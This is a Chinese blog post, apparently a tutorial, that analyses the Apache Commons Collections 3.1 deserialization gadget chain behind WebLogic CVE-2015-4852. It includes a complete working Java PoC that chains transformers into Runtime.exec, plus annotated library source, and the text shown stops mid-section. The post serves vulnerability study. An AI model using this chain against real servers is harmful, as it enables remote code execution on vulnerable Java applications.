https://www.fufu.me/tags/java/ Recent content in Java on 洛鹿松的小站 Hugo -- gohugo.io zh-cn Wed, 11 Jun 2025 00:13:01 +0800 https://www.fufu.me/apache-cc3.x/ Wed, 11 Jun 2025 00:13:01 +0800 https://www.fufu.me/apache-cc3.x/ <img src="https://www.fufu.me/img/202506110020489.png" alt="Featured image of post Apache-CC3.x链分析" /><p>前面我们了解了java的序列化机制，也初步接触了利用链的概念，为了加深对反序列化漏洞的理解，这里来复现一条存在于 <code>apache commons-collections.jar</code> 中的pop链，要知道这个类库使用广泛，所以很多大型的应用也存在着这个漏洞，这里就以 <code>Weblogic CVE-2015-4852</code> 来说说反序列化漏洞的具体利用方法。</p> <h2 id="漏洞利用成功条件">漏洞利用成功条件 </h2><ol> <li>payload：需要让服务端执行的语句：比如说弹计算器还是执行远程访问等；</li> <li>反序列化利用链：服务端中存在的反序列化利用链，会一层层剥开我们的exp，最后执行payload。(在此篇中就是cc利用链)</li> <li><code>readObject()</code> 函数的覆写利用点：服务端中存在可以与我们漏洞链相接并且可以从外部访问的 <code>readObject()</code> 函数覆写点；</li> </ol> <h2 id="攻击流程">攻击流程 </h2><ol> <li>客户端构造payload，并进行一层层的封装，完成最后的exp；</li> <li>exp发送到服务端，进入一个服务端自主覆写(也可能是也有组件覆写)的readObject()函数，它会反序列化恢复我们构造的exp去形成一个恶意类exp_1；</li> <li>这个恶意类exp_1在接下来的处理流程，会执行exp_1中的一个方法，在方法中会对exp_1的内容进行函数处理，从而一层层地解析exp_1变成exp_2、exp_3等；</li> <li>最后在一个可执行任意命令的函数中执行payload，完成远程代码执行。</li> </ol> <h2 id="环境准备">环境准备 </h2><ul> <li><a class="link" href="https://cloud.nicht.top/s/zXbI8" target="_blank" rel="noopener" >jdk1.7 <span style="white-space: nowrap;"><svg width=".7em" height=".7em" viewBox="0 0 21 21" xmlns="http://www.w3.org/2000/svg"> <path d="m13 3l3.293 3.293l-7 7l1.414 1.414l7-7L21 11V3z" fill="currentColor" /> <path d="M19 19H5V5h7l-2-2H5c-1.103 0-2 .897-2 2v14c0 1.103.897 2 2 2h14c1.103 0 2-.897 2-2v-5l-2-2v7z" fill="currentColor"> </svg></span> </a> </li> <li><a class="link" href="https://www.jetbrains.com/zh-cn/idea/download" target="_blank" rel="noopener" >IntelliJ IDEA <span style="white-space: nowrap;"><svg width=".7em" height=".7em" viewBox="0 0 21 21" xmlns="http://www.w3.org/2000/svg"> <path d="m13 3l3.293 3.293l-7 7l1.414 1.414l7-7L21 11V3z" fill="currentColor" /> <path d="M19 19H5V5h7l-2-2H5c-1.103 0-2 .897-2 2v14c0 1.103.897 2 2 2h14c1.103 0 2-.897 2-2v-5l-2-2v7z" fill="currentColor"> </svg></span> </a> </li> <li><a class="link" href="https://cloud.nicht.top/s/jnzhl" target="_blank" rel="noopener" >Weblogic-10.3.6 <span style="white-space: nowrap;"><svg width=".7em" height=".7em" viewBox="0 0 21 21" xmlns="http://www.w3.org/2000/svg"> <path d="m13 3l3.293 3.293l-7 7l1.414 1.414l7-7L21 11V3z" fill="currentColor" /> <path d="M19 19H5V5h7l-2-2H5c-1.103 0-2 .897-2 2v14c0 1.103.897 2 2 2h14c1.103 0 2-.897 2-2v-5l-2-2v7z" fill="currentColor"> </svg></span> </a> </li> <li><a class="link" href="https://cloud.nicht.top/s/rY2fg" target="_blank" rel="noopener" >commons-collections-3.1.jar <span style="white-space: nowrap;"><svg width=".7em" height=".7em" viewBox="0 0 21 21" xmlns="http://www.w3.org/2000/svg"> <path d="m13 3l3.293 3.293l-7 7l1.414 1.414l7-7L21 11V3z" fill="currentColor" /> <path d="M19 19H5V5h7l-2-2H5c-1.103 0-2 .897-2 2v14c0 1.103.897 2 2 2h14c1.103 0 2-.897 2-2v-5l-2-2v7z" fill="currentColor"> </svg></span> </a> </li> </ul> <link rel="stylesheet" href="https://www.fufu.me/css/vendors/admonitions.36e8c5929a3d594ec79663bfb5a00cc53d4137685c16e6a0d50b5f63e97a0150.css" integrity="sha256-NujFkpo9WU7HlmO/taAMxT1BN2hcFuag1QtfY&#43;l6AVA=" crossorigin="anonymous"> <div class="admonition note"> <div class="admonition-header"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"><path d="M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z"/></svg> <span>Note</span> </div> <div class="admonition-content"> <p>Java commons-collections是JDK 1.2中的一个主要新增部分。它添加了许多强大的数据结构，可以加速大多数重要Java应用程序的开发。从那时起，它已经成为Java中公认的集合处理标准。</p> </div> </div> <h2 id="poc代码">PoC代码 </h2><pre><code class="language-java">package Step3; import java.io.File; import java.io.FileInputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.lang.annotation.Retention; import java.lang.reflect.Constructor; import java.nio.file.Files; import java.util.HashMap; import java.util.Map; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.TransformedMap; public class PoC1 { public static Object GeneratePayload() throws Exception { Transformer transformerChain = getTransformer(); Map innermap = new HashMap(); innermap.put(&quot;value&quot;, &quot;re111&quot;); Map outmap = TransformedMap.decorate(innermap, null, transformerChain); Class cls = Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;); Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class); ctor.setAccessible(true); //通过setAccessible(true)的方式关闭安全检查 return ctor.newInstance(Retention.class, outmap); } private static Transformer getTransformer() { final Transformer[] transforms = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer(&quot;getMethod&quot;, new Class[]{String.class, Class[].class}, new Object[]{&quot;getRuntime&quot;, new Class[0]}), new InvokerTransformer(&quot;invoke&quot;, new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer(&quot;exec&quot;, new Class[]{String.class}, new String[]{&quot;galculator&quot;}), new ConstantTransformer(1) }; return new ChainedTransformer(transforms); } public static void main(String[] args) throws Exception { String fileName = &quot;./payload.bin&quot;; GeneratePayloadFile(GeneratePayload(), fileName); TriggerPayload(fileName); } public static void GeneratePayloadFile(Object instance, String file) throws Exception { File f = new File(file); ObjectOutputStream out = new ObjectOutputStream(Files.newOutputStream(f.toPath())); out.writeObject(instance); out.flush(); out.close(); } public static void TriggerPayload(String file) throws Exception { ObjectInputStream in = new ObjectInputStream(new FileInputStream(file)); in.readObject(); in.close(); } } </code></pre> <p>如果出现很多包缺失的报错，则需要导入 <a class="link" href="https://cloud.nicht.top/s/rY2fg" target="_blank" rel="noopener" >commons-collections-3.1.jar <span style="white-space: nowrap;"><svg width=".7em" height=".7em" viewBox="0 0 21 21" xmlns="http://www.w3.org/2000/svg"> <path d="m13 3l3.293 3.293l-7 7l1.414 1.414l7-7L21 11V3z" fill="currentColor" /> <path d="M19 19H5V5h7l-2-2H5c-1.103 0-2 .897-2 2v14c0 1.103.897 2 2 2h14c1.103 0 2-.897 2-2v-5l-2-2v7z" fill="currentColor"> </svg></span> </a> 包</p> <p>IDEA菜单栏-&gt;文件-&gt;项目结构-&gt;库-&gt;添加-&gt;按路径添加jar包即可</p> <p><img src="https://www.fufu.me/apache-cc3.x/images/20250605151954366.png" width="1529" height="516" srcset="https://www.fufu.me/apache-cc3.x/images/20250605151954366_hu16717351814288682926.png 480w, https://www.fufu.me/apache-cc3.x/images/20250605151954366_hu5845978913178611458.png 1024w" loading="lazy" alt="image_58" class="gallery-image" data-flex-grow="296" data-flex-basis="711px" ></p> <h3 id="transformer-链构造">Transformer 链构造 </h3><p>Commons Collections实现了一个TransformedMap类，该类是对Java标准数据结构Map接口的一个扩展。该类可以在一个元素被加入到集合内时，自动对该元素进行特定的修饰变换，具体的变换逻辑由Transformer类定义，Transformer在TransformedMap实例化时作为参数传入。</p> <p><code>org.apache.commons.collections.Transformer</code> 这个接口可以满足固定的类型转化需求，我们的漏洞利用就是在于这个点。</p> <p>我们在使用 <code>Apache Commons Collections</code> 库进行 Gadget 构造时主要利用的就是这个 <code>transformer</code> 接口，它只有一个待实现的方法 <code>transform()</code>。</p> <pre><code class="language-java">package org.apache.commons.collections; public interface Transformer { Object transform(Object var1); } </code></pre> <p>主要用于将一个对象通过 <code>transform</code> 方法转换为另一个对象，在库中众多对象转换的接口中存在一个 <code>Invoker</code> 类型的转换接口 <code>InvokerTransformer</code>，并且同时还实现了 <code>Serializable</code> 接口。</p> <pre><code class="language-java">public class InvokerTransformer implements Transformer, Serializable { static final long serialVersionUID = -8653385846894047688L; private final String iMethodName; private final Class[] iParamTypes; private final Object[] iArgs; public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) { this.iMethodName = methodName; this.iParamTypes = paramTypes; this.iArgs = args; } public Object transform(Object input) { if (input == null) { return null; } else { try { Class cls = input.getClass(); Method method = cls.getMethod(this.iMethodName, this.iParamTypes); return method.invoke(input, this.iArgs); } catch (NoSuchMethodException var5) { throw new FunctorException(&quot;InvokerTransformer: The method '&quot; + this.iMethodName + &quot;' on '&quot; + input.getClass() + &quot;' does not exist&quot;); } catch (IllegalAccessException var6) { throw new FunctorException(&quot;InvokerTransformer: The method '&quot; + this.iMethodName + &quot;' on '&quot; + input.getClass() + &quot;' cannot be accessed&quot;); } catch (InvocationTargetException var7) { throw new FunctorException(&quot;InvokerTransformer: The method '&quot; + this.iMethodName + &quot;' on '&quot; + input.getClass() + &quot;' threw an exception&quot;, var7); } } } } </code></pre> <p>可以看到 <code>InvokerTransformer</code> 类中实现的 <code>transform()</code> 接口使用 Java 反射机制获取反射对象 <code>input</code> 中的参数类型为 <code>iParamTypes</code> 的方法 <code>iMethodName</code>，然后使用对应参数 <code>iArgs</code> 调用获取的方法，并将执行结果返回。由于其实现了 Serializable 接口，因此其中的三个必要参数 iMethodName、iParamTypes 和 iArgs 都是可以通过序列化直接构造的，为命令执行创造了条件，但是只有这里的话显然并不能RCE。</p> <p>继续看 <code>ChainedTransformer</code></p> <pre><code class="language-java">public class ChainedTransformer implements Transformer, Serializable { static final long serialVersionUID = 3514945074733160196L; private final Transformer[] iTransformers; ... public ChainedTransformer(Transformer[] transformers) { this.iTransformers = transformers; } public Object transform(Object object) { for(int i = 0; i &lt; this.iTransformers.length; ++i) { object = this.iTransformers[i].transform(object); } return object; } } </code></pre> <p>这里可以看出来是挨个遍历 <code>transformer</code>，调用<code>ChainedTransformer</code> 的 <code>transform</code> 方法然后返回object，返回的object继续进入循环，成为下一次调用的参数，所以我们可以通过这里来执行命令。</p> <pre><code class="language-java">private static Transformer getTransformer() { final Transformer[] transforms = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer(&quot;getMethod&quot;, new Class[]{String.class, Class[].class}, new Object[]{&quot;getRuntime&quot;, new Class[0]}), new InvokerTransformer(&quot;invoke&quot;, new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer(&quot;exec&quot;, new Class[]{String.class}, new String[]{&quot;galculator&quot;}), new ConstantTransformer(1) }; return new ChainedTransformer(transforms); } </code></pre> <p>这一链条构成了核心 payload 的代码执行链，每一步的具体含义。</p> <table> <thead> <tr> <th>步骤</th> <th>说明</th> </tr> </thead> <tbody> <tr> <td><code>ConstantTransformer(Runtime.class)</code></td> <td>初始返回 <code>java.lang.Runtime.class</code></td> </tr> <tr> <td><code>getMethod(&quot;getRuntime&quot;, ...)</code></td> <td>调用反射获取 <code>Runtime.getRuntime()</code> 方法对象</td> </tr> <tr> <td><code>invoke(null, new Object[0])</code></td> <td>执行 <code>getRuntime()</code> 方法，返回 <code>Runtime.getRuntime()</code> 实例</td> </tr> <tr> <td><code>exec(&quot;galculator&quot;)</code></td> <td>执行命令 <code>galculator</code>（Linux 图形计算器）</td> </tr> <tr> <td><code>ConstantTransformer(1)</code></td> <td>后续调用无害的返回值，掩盖攻击目的</td> </tr> </tbody> </table> <div class="admonition tip"> <div class="admonition-header"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512"><path d="M272 384c9.6-31.9 29.5-59.1 49.2-86.2c0 0 0 0 0 0c5.2-7.1 10.4-14.2 15.4-21.4c19.8-28.5 31.4-63 31.4-100.3C368 78.8 289.2 0 192 0S16 78.8 16 176c0 37.3 11.6 71.9 31.4 100.3c5 7.2 10.2 14.3 15.4 21.4c0 0 0 0 0 0c19.8 27.1 39.7 54.4 49.2 86.2l160 0zM192 512c44.2 0 80-35.8 80-80l0-16-160 0 0 16c0 44.2 35.8 80 80 80zM112 176c0 8.8-7.2 16-16 16s-16-7.2-16-16c0-61.9 50.1-112 112-112c8.8 0 16 7.2 16 16s-7.2 16-16 16c-44.2 0-80 35.8-80 80z"/></svg> <span>Tip</span> </div> <div class="admonition-content"> <p>环境中不可能直接存在 <code>Runtime.class</code>，所以我们通过构造来产生。</p> <p><code>ConstantTransformer</code> 类初始化传入 <code>this.iConstant</code> 参数直接return，相当于this的作用。</p> <pre><code class="language-java">public class ConstantTransformer implements Transformer, Serializable { static final long serialVersionUID = 6374440726369055124L; public static final Transformer NULL_INSTANCE = new ConstantTransformer((Object) null); private final Object iConstant; public ConstantTransformer(Object constantToReturn) { this.iConstant = constantToReturn; } public Object transform(Object input) { return this.iConstant; } } </code></pre> </div> </div> <p>向 <code>ChainedTransformer</code> 传入 <code>transformers</code></p> <pre><code class="language-java">public ChainedTransformer(Transformer[] transformers) { this.iTransformers = transformers; } </code></pre> <p>然后构造的命令参数传入 <code>InvokerTransformer</code></p> <pre><code class="language-java">public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) { this.iMethodName = methodName; this.iParamTypes = paramTypes; this.iArgs = args; } </code></pre> <p>这里都会赋值,然后就会调用到</p> <pre><code class="language-java">public Object transform(Object input) { if (input == null) { return null; } else { try { Class cls = input.getClass(); Method method = cls.getMethod(this.iMethodName, this.iParamTypes); return method.invoke(input, this.iArgs); } catch (NoSuchMethodException var5) { throw new FunctorException(&quot;InvokerTransformer: The method '&quot; + this.iMethodName + &quot;' on '&quot; + input.getClass() + &quot;' does not exist&quot;); } catch (IllegalAccessException var6) { throw new FunctorException(&quot;InvokerTransformer: The method '&quot; + this.iMethodName + &quot;' on '&quot; + input.getClass() + &quot;' cannot be accessed&quot;); } catch (InvocationTargetException var7) { throw new FunctorException(&quot;InvokerTransformer: The method '&quot; + this.iMethodName + &quot;' on '&quot; + input.getClass() + &quot;' threw an exception&quot;, var7); } } } </code></pre> <p>经过反射达成如下效果，这条语句就是我们想要构建的核心 payload</p> <pre><code class="language-java">Class.forName(&quot;java.lang.Runtime&quot;).getMethod(&quot;getRuntime&quot;).invoke(Class.forName(&quot;java.lang.Runtime&quot;)).exec(&quot;galculator&quot;); </code></pre> <div class="admonition tip"> <div class="admonition-header"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512"><path d="M272 384c9.6-31.9 29.5-59.1 49.2-86.2c0 0 0 0 0 0c5.2-7.1 10.4-14.2 15.4-21.4c19.8-28.5 31.4-63 31.4-100.3C368 78.8 289.2 0 192 0S16 78.8 16 176c0 37.3 11.6 71.9 31.4 100.3c5 7.2 10.2 14.3 15.4 21.4c0 0 0 0 0 0c19.8 27.1 39.7 54.4 49.2 86.2l160 0zM192 512c44.2 0 80-35.8 80-80l0-16-160 0 0 16c0 44.2 35.8 80 80 80zM112 176c0 8.8-7.2 16-16 16s-16-7.2-16-16c0-61.9 50.1-112 112-112c8.8 0 16 7.2 16 16s-7.2 16-16 16c-44.2 0-80 35.8-80 80z"/></svg> <span>Tip</span> </div> <div class="admonition-content"> <p>执行 <code>Class.forName(&quot;java.lang.Runtime&quot;).getMethod(&quot;getRuntime&quot;)</code> 这部分语句，</p> <p>也就是执行<code>Runtime.class.getMethod(&quot;getRuntime&quot;)</code>，获得Runtime的getRuntime方法定义。</p> <p>由于上述是静态方法，所以<code>invoke(Class.forName(&quot;java.lang.Runtime&quot;))</code>也可以写成<code>invoke(null)</code>，执行上述方法得到一个实例，然后用这个实例调用exec(&ldquo;galculator&rdquo;)弹出计算器</p> </div> </div> <h3 id="封装成map">封装成Map </h3><p>要想实现RCE还需要一个入口点，使得应用在反序列化的时候能够通过一条调用链来触发 <code>InvokerTransformer</code> 中的 <code>transform()</code> 方法，有两个类中使用了可疑的 <code>transform()</code> 方法： <code>LazyMap</code> 和 <code>TransformedMap</code>。</p> <p><code>TransformedMap</code> 中一共有三处函数使用了transform方法</p> <p><img src="https://www.fufu.me/apache-cc3.x/images/202506081655900.png" width="2079" height="1321" srcset="https://www.fufu.me/apache-cc3.x/images/202506081655900_hu16797668860235496195.png 480w, https://www.fufu.me/apache-cc3.x/images/202506081655900_hu5960003941667884196.png 1024w" loading="lazy" alt="image_63" class="gallery-image" data-flex-grow="157" data-flex-basis="377px" ></p> <p>当然，光是使用了transform这个方法还不行，我们还需要确认是使用了<code>ChainedTransformer.transform()</code>，我们看一下 <code>this.valueTransformer</code> 的类型</p> <p><img src="https://www.fufu.me/apache-cc3.x/images/202506081728546.png" width="1421" height="591" srcset="https://www.fufu.me/apache-cc3.x/images/202506081728546_hu11172588542927478617.png 480w, https://www.fufu.me/apache-cc3.x/images/202506081728546_hu16698640920507920963.png 1024w" loading="lazy" alt="image_64" class="gallery-image" data-flex-grow="240" data-flex-basis="577px" ></p> <p>可以看到 <code>this.valueTransformer</code> 的类型是Transformer，所以在构造poc的时候只需要将他的值赋为我们精心构造的 <code>ChainedTransformer</code> 就行，这里只要 <code>valueTransformer</code> 可控即可利用上面的调用链</p> <pre><code class="language-java">protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) { super(map); this.keyTransformer = keyTransformer; this.valueTransformer = valueTransformer; } </code></pre> <p>当我们初始化的时候是可以控制的，怎么触发呢</p> <p><code>checkSetValue()</code> 方法可以办到这一点，它会将我们传入的value对象使用 <code>transform()</code> 方法进行处理</p> <pre><code class="language-java">protected Object checkSetValue(Object value) { return this.valueTransformer.transform(value); } </code></pre> <div class="admonition caution"> <div class="admonition-header"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M256 32c14.2 0 27.3 7.5 34.5 19.8l216 368c7.3 12.4 7.3 27.7 .2 40.1S486.3 480 472 480L40 480c-14.3 0-27.6-7.7-34.7-20.1s-7-27.8 .2-40.1l216-368C228.7 39.5 241.8 32 256 32zm0 128c-13.3 0-24 10.7-24 24l0 112c0 13.3 10.7 24 24 24s24-10.7 24-24l0-112c0-13.3-10.7-24-24-24zm32 224a32 32 0 1 0 -64 0 32 32 0 1 0 64 0z"/></svg> <span>Caution</span> </div> <div class="admonition-content"> <p>错误：当进入 <code>put</code> 方法的时候会触发valueTransformer的构造方法，也可以调用 <code>transform()</code> 方法</p> <pre><code class="language-java">protected Object transformValue(Object object) { return this.valueTransformer == null ? object : this.valueTransformer.transform(object); } </code></pre> <p>正确流程：我们构造的 <code>TransformedMap</code> 在 <code>AnnotationInvocationHandler.readObject()</code> 反序列化中对 <code>Map.Entry.setValue()</code> （或者说是内部类 <code>TransformedMap$TransformedEntry</code> 的setValue()方法，这个内部类的具体代码可以到<code>transformedMap</code> 的父类 <code>AbstractInputCheckedMapDecorator</code> 中寻找）进行了调用，这个set方法又调用了 <code>transformedMap</code> 的 <code>checkSetValue()</code> 方法，这个方法调用了关键的transform方法，然后打通了链子。</p> </div> </div> <p>根据上面的调用链我们的 <code>value</code> 位置可以设定为任意值，因为反序列化过程中会触发 <code>.setValue(...)</code>，而不是读取初始的值。</p> <p>现在的poc可以用TransformedMap的三个方法 <code>transformKey</code> 、<code>transformValue</code> 、<code>checkSetValue</code> 触发transform方法，但是这三个方法的访问权限都是protected，也就是不能直接被外部访问。</p> <p>迂回一下，TransformedMap类中一共有三个方法访问权限是public</p> <pre><code class="language-java">public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) { return new TransformedMap(map, keyTransformer, valueTransformer); } public Object put(Object key, Object value) { key = this.transformKey(key); value = this.transformValue(value); return this.getMap().put(key, value); } public void putAll(Map mapToCopy) { mapToCopy = this.transformMap(mapToCopy); this.getMap().putAll(mapToCopy); } </code></pre> <p>可以看到put方法调用了transformKey以及transformValue,这两个方法又都调用了transform方法，所以我们可以通过调用修饰函数实例化一个TransforomedMap对象，然后调用对象的put方法将我们构造的链子传入，从而执行任意命令。</p> <pre><code class="language-java">Map innermap = new HashMap(); innermap.put(&quot;value&quot;, &quot;re111&quot;); Map outmap = TransformedMap.decorate(innermap, null, transformerChain); </code></pre> <p>这样我们即可进行命令执行。</p> <h3 id="反序列化操作触发函数">反序列化操作触发函数 </h3><p><strong>jdk1.7-AnnotationInvocationHandler</strong></p> <p>但是在现实场景中，并没有人帮我们执行这个函数。所以我们现在要开始寻找，有没有哪个类，在它的 <code>readObject()</code> 逻辑中会触发这个动作（给Map新增元素）。</p> <p>这个类就是 <code>sun.reflect.annotation.AnnotationInvocationHandler</code>，这是⼀个java的原生类。</p> <p>这个函数在jdk1.7中，这也是为什么要求jdk1.7环境，高版本jdk不支持的原因在后面解答。</p> <p><img src="https://www.fufu.me/apache-cc3.x/images/20250608135804910.png" width="2560" height="1440" srcset="https://www.fufu.me/apache-cc3.x/images/20250608135804910_hu3047679128671387147.png 480w, https://www.fufu.me/apache-cc3.x/images/20250608135804910_hu4253113411105463186.png 1024w" loading="lazy" alt="image-20250608135757528" class="gallery-image" data-flex-grow="177" data-flex-basis="426px" ></p> <p>反编译的代码，看起来有点别扭。而且因为我本机是jdk1.8，所以这个类并不是我们真正想要的。</p> <p>给大家推荐一个好的方式，就是去github上看，openjdk是开源的。github上还有版本管理， 然后再给大家推荐一个网站，github1s，可以在线用vscode</p> <p><a class="link" href="https://github1s.com/openjdk/jdk/blob/jdk8-b40/jdk/src/share/classes/sun/reflect/annotation/AnnotationInvocationHan" target="_blank" rel="noopener" >https://github1s.com/openjdk/jdk/blob/jdk8-b40/jdk/src/share/classes/sun/reflect/annotation/AnnotationInvocationHan <span style="white-space: nowrap;"><svg width=".7em" height=".7em" viewBox="0 0 21 21" xmlns="http://www.w3.org/2000/svg"> <path d="m13 3l3.293 3.293l-7 7l1.414 1.414l7-7L21 11V3z" fill="currentColor" /> <path d="M19 19H5V5h7l-2-2H5c-1.103 0-2 .897-2 2v14c0 1.103.897 2 2 2h14c1.103 0 2-.897 2-2v-5l-2-2v7z" fill="currentColor"> </svg></span> </a> </p> <p><img src="https://www.fufu.me/apache-cc3.x/images/202506081500579.png" width="2560" height="1379" srcset="https://www.fufu.me/apache-cc3.x/images/202506081500579_hu17075339667449952094.png 480w, https://www.fufu.me/apache-cc3.x/images/202506081500579_hu8705578537381364873.png 1024w" loading="lazy" alt="image_61" class="gallery-image" data-flex-grow="185" data-flex-basis="445px" ></p> <p>我们先看这个类的构造函数</p> <pre><code class="language-java">AnnotationInvocationHandler(Class&lt;? extends Annotation&gt; type, Map&lt;String, Object&gt; memberValues) { this.type = type; this.memberValues = memberValues; } </code></pre> <p>我们看到，它可以接受一个Map来作为参数。</p> <p>然后我们再看它的 <code>readObject()</code> 做了什么</p> <pre><code class="language-java">private void readObject(java.io.ObjectInputStream s) throws java.io.IOException, ClassNotFoundException { s.defaultReadObject(); // Check to make sure that types have not evolved incompatibly AnnotationType annotationType = null; try { annotationType = AnnotationType.getInstance(type); } catch (IllegalArgumentException e) { // Class is no longer an annotation type; all bets are off return; } Map&lt;String, Class&lt;?&gt;&gt; memberTypes = annotationType.memberTypes(); for (Map.Entry&lt;String, Object&gt; memberValue : memberValues.entrySet()) { String name = memberValue.getKey(); Class&lt;?&gt; memberType = memberTypes.get(name); if (memberType != null) { // i.e. member still exists Object value = memberValue.getValue(); if (!(memberType.isInstance(value) || value instanceof ExceptionProxy)) { memberValue.setValue( new AnnotationTypeMismatchExceptionProxy( value.getClass() + &quot;[&quot; + value + &quot;]&quot;).setMember( annotationType.members().get(name))); } } } } </code></pre> <p>将 <code>memberValues</code> 转化成一个set，然后再迭代一下就又取出了一个Map叫做 <code>memberValue</code>。 我们只要将这个 <code>memberValue</code> 设置为我们构造的一个 <code>TransformedMap</code> 对象，然后当它在后面执行 <code>memberValue.setValue</code> 时，就会触发我们注册的 <code>Transformer</code>，进而执行我们为其精心设计的任意代码。</p> <h3 id="内部类的调用">内部类的调用 </h3><p>当我们想要直接new一个 <code>sun.reflect.annotation.AnnotationInvocationHandler</code> 对象时，发现了问题，因为这是一个内部类，导致我们无法直接访问，这个时候怎么办，还是用反射。</p> <pre><code class="language-java">Map innermap = new HashMap(); innermap.put(&quot;value&quot;, &quot;re111&quot;); // key是&quot;value&quot;，这是注解方法名 Map outmap = TransformedMap.decorate(innermap, null, transformerChain); Class cls = Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;); Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class); ctor.setAccessible(true);//通过setAccessible(true)的方式关闭安全检查 return ctor.newInstance(Retention.class, outmap); </code></pre> <h3 id="innermapput-固定key值">innermap.put 固定key值 </h3><p>这里明确需要明确一点</p> <pre><code class="language-java">type = Retention.class memberValues = transformerdMap </code></pre> <p>我们的目的是触发对Map的写入操作，所以我们的目标是触发 <code>memberValue.setValue</code> 这条逻辑。所以此时，如果memberValues是一个空的map，那么这个for的遍历就不会执行，所以我们需要预先给Map进行值的插入。</p> <p>但是要插入什么呢？</p> <pre><code class="language-java">String name = memberValue.getKey(); //Map可控，所以key可控 Class&lt;?&gt; memberType = memberTypes.get(name); if (memberType != null) { //!要求在memberType中也有这个key ... } </code></pre> <p>所以我们要了解 <code>memberTypes</code> 是怎么来的</p> <pre><code class="language-java">AnnotationType annotationType = null; try { annotationType = AnnotationType.getInstance(type); } catch(IllegalArgumentException e) { // Class is no longer an annotation type; all bets are off return; } Map&lt;String, Class&lt;?&gt;&gt; memberTypes = annotationType.memberTypes(); </code></pre> <p>查看 <code>AnnotationType.class</code></p> <pre><code class="language-java">public class AnnotationType { /* ... ... ... */ public static synchronized AnnotationType getInstance( Class&lt;? extends Annotation&gt; annotationClass) { AnnotationType result = sun.misc.SharedSecrets.getJavaLangAccess(). getAnnotationType(annotationClass); if (result == null) result = new AnnotationType((Class&lt;? extends Annotation&gt;) annotationClass); return result; } private AnnotationType(final Class&lt;? extends Annotation&gt; annotationClass) { if (!annotationClass.isAnnotation()) throw new IllegalArgumentException(&quot;Not an annotation type&quot;); Method[] methods = AccessController.doPrivileged(new PrivilegedAction&lt;Method[]&gt;() { public Method[] run() { // Initialize memberTypes and defaultValues return annotationClass.getDeclaredMethods(); } }); for (Method method : methods) { if (method.getParameterTypes().length != 0) throw new IllegalArgumentException(method + &quot; has params&quot;); String name = method.getName(); Class&lt;?&gt; type = method.getReturnType(); memberTypes.put(name, invocationHandlerReturnType(type)); members.put(name, method); Object defaultValue = method.getDefaultValue(); if (defaultValue != null) memberDefaults.put(name, defaultValue); members.put(name, method); } sun.misc.SharedSecrets.getJavaLangAccess(). setAnnotationType(annotationClass, this); // Initialize retention, &amp; inherited fields. Special treatment // of the corresponding annotation types breaks infinite recursion. if (annotationClass != Retention.class &amp;&amp; annotationClass != Inherited.class) { Retention ret = annotationClass.getAnnotation(Retention.class); retention = (ret == null ? RetentionPolicy.CLASS : ret.value()); inherited = annotationClass.isAnnotationPresent(Inherited.class); } } /* ... ... ... */ } </code></pre> <p>注意到这里有一句</p> <pre><code class="language-java">if (!annotationClass.isAnnotation()) throw new IllegalArgumentException(&quot;Not an annotation type&quot;); </code></pre> <p>就是检查输入的参数是不是一个注解类，如果不是就会报错。</p> <p>所以这里要求第一个参数必须是一个注解类。然后</p> <pre><code class="language-java"> Method[] methods = AccessController.doPrivileged(new PrivilegedAction&lt;Method[]&gt;() { public Method[] run() { // Initialize memberTypes and defaultValues return annotationClass.getDeclaredMethods(); } }); for (Method method : methods) { if (method.getParameterTypes().length != 0) throw new IllegalArgumentException(method + &quot; has params&quot;); String name = method.getName(); Class&lt;?&gt; type = method.getReturnType(); memberTypes.put(name, invocationHandlerReturnType(type)); </code></pre> <p>这里会通过反射的方式，获取该注解类所有的方法，然后再将所有的方法名塞给memberTypes这个Map</p> <p>而我们这里要获取的就是memberTypes</p> <p><img src="https://www.fufu.me/apache-cc3.x/images/202506081844157.png" width="760" height="317" srcset="https://www.fufu.me/apache-cc3.x/images/202506081844157_hu6194532569128885191.png 480w, https://www.fufu.me/apache-cc3.x/images/202506081844157_hu15879813456095383231.png 1024w" loading="lazy" alt="image-20250608184416729" class="gallery-image" data-flex-grow="239" data-flex-basis="575px" ></p> <p>所以我们的需求就变成了，对于 <code>sun.reflect.annotation.AnnotationInvocationHandler</code> 这个类的构造函数</p> <pre><code class="language-java">AnnotationInvocationHandler(Class&lt;? extends Annotation&gt; type, Map&lt;String, Object&gt; memberValues) { this.type = type; this.memberValues = memberValues; } </code></pre> <p>需要找到一个参数type，满足</p> <div class="admonition tip"> <div class="admonition-header"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512"><path d="M272 384c9.6-31.9 29.5-59.1 